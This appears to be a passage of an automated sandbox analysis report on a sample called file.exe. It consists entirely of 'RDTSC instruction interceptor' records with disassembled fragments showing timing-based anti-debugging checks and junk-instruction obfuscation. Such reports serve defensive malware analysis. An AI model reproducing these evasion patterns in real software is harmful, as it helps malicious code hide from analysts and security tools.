Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BF84F second address: 2BF8AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F625CED05C0h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F625CED05B8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D325Dh] 0x0000002e xor dword ptr [ebp+1244D69Fh], eax 0x00000034 push 00000000h 0x00000036 sub esi, dword ptr [ebp+122D29D6h] 0x0000003c push 00000000h 0x0000003e movsx edi, bx 0x00000041 xchg eax, ebx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BF8AB second address: 2BF8AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BF8AF second address: 2BF8BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F625CED05B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BF8BD second address: 2BF8C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C0037 second address: 2C003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C0B57 second address: 2C0B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C89D8 second address: 2C89FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F625CED05C1h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f je 00007F625CED05C4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C89FD second address: 2C8A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CB6E5 second address: 2CB708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F625CED05C8h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CB708 second address: 2CB757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 nop 0x00000007 mov ebx, 3EE1ECF1h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f jmp 00007F625CDF2474h 0x00000014 pop edi 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D2D52h], ecx 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007F625CDF2475h 0x00000025 jno 00007F625CDF2466h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e push esi 0x0000002f pop esi 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CC6F9 second address: 2CC703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F625CED05B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C6BDF second address: 2C6BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C6BE5 second address: 2C6BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C6BE9 second address: 2C6BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C7BFA second address: 2C7C10 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F625CED05B8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C7C10 second address: 2C7C15 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CFB9B second address: 2CFBBC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F625CED05BCh 0x00000008 ja 00007F625CED05B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jnc 00007F625CED05BCh 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CB9B7 second address: 2CB9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CB9BC second address: 2CB9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F625CED05B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D1B30 second address: 2D1B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D1B38 second address: 2D1B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CED05C6h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D1B5B second address: 2D1B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D1B61 second address: 2D1B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D1B65 second address: 2D1B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D3A36 second address: 2D3AB8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F625CED05B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F625CED05B8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 call 00007F625CED05C9h 0x0000002d cld 0x0000002e pop ebx 0x0000002f or dword ptr [ebp+12450E42h], ecx 0x00000035 push 00000000h 0x00000037 and ebx, dword ptr [ebp+122D1D4Ah] 0x0000003d push 00000000h 0x0000003f xchg eax, esi 0x00000040 jmp 00007F625CED05C8h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jne 00007F625CED05BCh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D3AB8 second address: 2D3AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F625CDF246Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CEAB7 second address: 2CEABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CEABB second address: 2CEAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CEBE9 second address: 2CEBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CD9C0 second address: 2CD9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CD9C4 second address: 2CD9CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CD9CA second address: 2CD9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F625CDF2466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D4B3B second address: 2D4B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DD955 second address: 2DD96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F625CDF246Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DD96D second address: 2DD977 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F625CED05B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DD12A second address: 2DD12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DD12E second address: 2DD13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F625CED05BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DD581 second address: 2DD5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F625CDF2466h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f je 00007F625CDF2466h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop eax 0x00000018 jg 00007F625CDF2478h 0x0000001e jmp 00007F625CDF2470h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E1615 second address: 2E1641 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F625CED05B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F625CED05C9h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E1641 second address: 2E1669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edi 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnc 00007F625CDF2484h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F625CDF2476h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E16EF second address: 2E16FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E16FC second address: 2E1706 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F625CDF2466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E1706 second address: 2E171C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jp 00007F625CED05C8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E171C second address: 2E1720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E1720 second address: 2E1724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E1724 second address: 2E1752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jmp 00007F625CDF2470h 0x0000000e jc 00007F625CDF2468h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27DD80 second address: 27DD9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F625CED05C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E68BF second address: 2E68E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF2477h 0x00000009 push edi 0x0000000a jng 00007F625CDF2466h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6EE4 second address: 2E6EF5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F625CED05B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6EF5 second address: 2E6EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6EFB second address: 2E6F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6F06 second address: 2E6F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E71C9 second address: 2E71CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E71CD second address: 2E71D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E71D3 second address: 2E71F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F625CED05C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E71F8 second address: 2E7213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jg 00007F625CDF2466h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E7213 second address: 2E7219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E7219 second address: 2E721F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E736E second address: 2E7374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E7374 second address: 2E7391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Fh 0x00000007 je 00007F625CDF2466h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E7391 second address: 2E739B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F625CED05B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E739B second address: 2E73AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F625CDF2466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F625CDF246Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED6AE second address: 2ED6B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED6B4 second address: 2ED6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EC107 second address: 2EC10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EC10D second address: 2EC113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EC913 second address: 2EC934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F625CED05B6h 0x0000000a jmp 00007F625CED05C7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EC934 second address: 2EC93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EC93A second address: 2EC965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F625CED05C9h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EC965 second address: 2EC969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EC969 second address: 2EC96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EC96D second address: 2EC97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jc 00007F625CDF2466h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED4F0 second address: 2ED4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED4F4 second address: 2ED508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2470h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EBDEF second address: 2EBDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EBDF3 second address: 2EBDF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EBDF7 second address: 2EBE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F625CED05BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3380 second address: 2C3385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3385 second address: 2C341B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F625CED05B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007F625CED05C8h 0x00000014 jmp 00007F625CED05C1h 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F625CED05B8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov di, F0A4h 0x00000039 lea eax, dword ptr [ebp+12488174h] 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007F625CED05B8h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 sub ch, 0000000Fh 0x0000005c mov dword ptr [ebp+1244C247h], edx 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 jnp 00007F625CED05B6h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C341B second address: 2A3ED6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F625CDF2466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jnp 00007F625CDF2466h 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F625CDF2468h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr [ebp+124510EFh], ecx 0x00000036 stc 0x00000037 call dword ptr [ebp+122D1CFAh] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 pop edi 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3640 second address: 2C3655 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F625CED05BCh 0x00000008 jl 00007F625CED05B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3A86 second address: 2C3A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3A8A second address: 2C3AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 add dword ptr [esp], 358F7157h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F625CED05B8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 call 00007F625CED05B9h 0x0000002d jc 00007F625CED05D5h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3AC7 second address: 2C3B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F625CDF2470h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F625CDF2476h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3B13 second address: 2C3B18 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3B18 second address: 2C3B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F625CDF2471h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 pushad 0x00000014 je 00007F625CDF2466h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
